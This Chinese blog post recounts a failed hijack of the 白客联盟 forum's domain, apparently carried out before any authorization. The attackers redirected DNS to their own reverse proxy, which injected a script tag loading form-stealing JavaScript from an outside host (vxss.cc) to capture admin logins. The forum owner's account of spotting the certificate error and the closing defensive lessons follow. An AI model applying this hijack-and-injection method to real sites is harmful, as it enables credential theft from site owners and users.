不知道是我个人的表达问题，还是大众站长普遍认为，HTTPS，SSL证书就是用来装13的，因为确实，HTTPS很好用，好用的人人都愿意去做，各个浏览器都显示绿标，一路畅通的感觉。难免忽略了https最初，也是最本质的目的是加密，防止攻击等等等。。。接下来我们就来讲讲这个案例。

以下文章来源于网络安全人员，胆小慎看！！！

成功的渗透测试套路基本都是那一套。换汤不换药，不成功的原因却是千奇百怪。

我本人感觉，一次不成功的测试如果讲解细致的话反而更能提升技术水平。

这次就来讲一下针对白客联盟的渗透测试是因何失败的，具体操作方式，是通过社工手动劫持域名，然后结合反向代理添加恶意代码劫持白客联盟的登录表单(打个比方就是做一个恶意CDN)。

这次渗透是nosafe团队协同参与的，渗透前期信息踩点和域名权限获取是由XXX（暂不方便透露）完成，因为具体操作手法牵扯到域名商安全问题，以及大量站长个人信息。这里不方便做详细讲解.

但是本次渗透过程一大半的功劳都在于XXX（也就是上面那个XXX同志）！他的努力让我获取到了域名权限。可以进行下一步的劫持操作

域名权限获取之后 渗透前期工作已经做完，由XX接手操作。

可以看到 白客联盟是通过https访问的，并且仅限https访问，这是本次渗透测试失败的主要原因。

使用nosafe域名劫持半自动化钓鱼工具，可以直接一键搭建构造恶意反向代理。

这里我按照我们的系统提示进行了操作 将他的www域名cname解析至我们的fuck.hackgo.top。

我们这里看一下替换关键字符的方式

针对discuz(其实任何网站都可以这样)

我们设置目标关键字为

替换后的字符为< src='http://vxss.cc/wC0j9v'>;

这样做的目的是为了把我们的表单劫持js通过恶意反向代理插入到他的网页去

本来当我准备坐等管理员登录后台收密码的时候。。缺发现域名dns被改回去了

也就是说我丢失了域名权限..

..按照成功的套路来讲，站长根本发现不了网站有误差呀。。到底哪里出了问题呢

为了给大家最官方的答复。。在这里也感谢白客联盟站长jumbo后期给了我授权，并且他本人把当时他所遇到的情况总结了出来，好让大家总结失败原因。学习原文：说说我咋发现我论坛被劫持的....

17号突然发现我论坛（白客联盟）绿色证书变红色了，我擦，这一看就是被劫持或者mitm了啊，赶紧超级ping下我域名，我擦，ip变45上了，但是我没管，因为我论坛还能访问（实际上是我懒），又因为是我司网速问题。

17号晚回到家，发现我的https绿色证书还是红色，论坛链接全变我的服务器ip了，还是不管，我还是以为是我宿舍网速问题。。。

18号，发现还是红色，再次超级ping下，发现ip还是45，不是我的，然后我上服务器，把我服务器重启了下，发现我论坛无法访问了，说明是域名是在我这服务器上的啊。

但是我前几天看到XXX（这是另一个大神）劫持安全脉搏的文章，我觉得肯定有问题，上idc代理商，发现dns正常，就没管，到了下午，我就跑到真正的域名商那里登录下，发现dns被改成ffdns的了，我擦，这个dns不就是XXX（也就是刚刚那个大神）基友劫持安全脉搏用的dns，这里已经确定我https证书变红色，ip变了是被劫持了，不是我公司、宿舍网速问题了。。而且我访问那个45ip，发现他的站跟我一样，一看就是把我站仿了过来，然后想跟安全脉搏一样，想劫持我后台密码。。我这里做了个安全保护措施，就是我登录后台时直接用ip登录，或者是本地host绑定，这样对方如果在劫持的情况下也无法劫持到我的后台密码并为了以防万一我修改了后台密码。然后我赶紧百度查了下，一开始看错了，以为是加速乐的，

登录我的账号，发现我的域名还在我的原先加速乐账号上，说明不是劫持到加速乐上了，而且我的域名XXXX（域名就不说了）.com还在我原先加速乐账号上，（这里要说下，比如某个账号把某个域名放到某个dns商自己名下了，就算dns没改成你现在的，你也没法解析，但是如果对方也是想用你现在的dns商，是没法添加他的域名的，因为他的域名被你添加到了你的账号，）于是又去百度搜了下，才发现是牛盾，

我就注册了个账号，由于验证邮件迟迟没收到，就跑去跟牛顿客服说，

牛盾客服竟然说没我的域名，难道劫持者把我dns改成牛盾dns后就没反应了？不可能啊，因为我ping我域名，发现是被劫持到别处了，不管，点击重新发送邮件，终于验证成功了，我就添加我的域名，提示已经被绑定过了！！

难道客服骗我，不行，继续找他

果然，就是跑牛盾这边来了，那我现在的目的就是搞到这个劫持者注册牛盾的账号信息，但是无论论我如何恐吓，甚至是报警都没法打动对方，

突然对方客服给我发了XXX劫持安全脉搏的文章，我擦，这是咋回事，难道这个牛盾是XXX开的？怪不得每次劫持都用牛盾，后来发现并不是。。

算了算了，累了，不查下去了，最后的决定就是把域名转到万网。然后刚刚XXX加我了，于是我说

他这么说让我很焦灼啊。。。

以上是本次实战的全部内容，由此我们可以得到一些经验和需要注意的。

1、部署了的HTTPS从绿色变成红色了，是不是要看下域名是否被劫持了。

2、对https的经验过少 以至于在构造反向代理时忽略了证书一致性问题 导致浏览器提示证书错误 https不安全， 被站长发现。通过host绑定后访问。让域名劫持失效。

3、一定要选择可靠的域名注册商，哪怕域名被劫持可以第一时间响应。

4、除了网站安全外，一定要注意自己的域名安全。

5、HTTPS从绿变红不一定是因为域名被劫持了，如网站加载调用的不安全的JS，CSS，或多媒体文件等也会显示红标，另外同一网站绑定多域名也会产品类似问题，出现红标的时候莫慌，抱紧小编即可。（下方留言）

本文到此处就结束了，如果您对关于HTTPS方面有什么要说的意见或建议，希望留言告诉我们，我们野会分享给大家。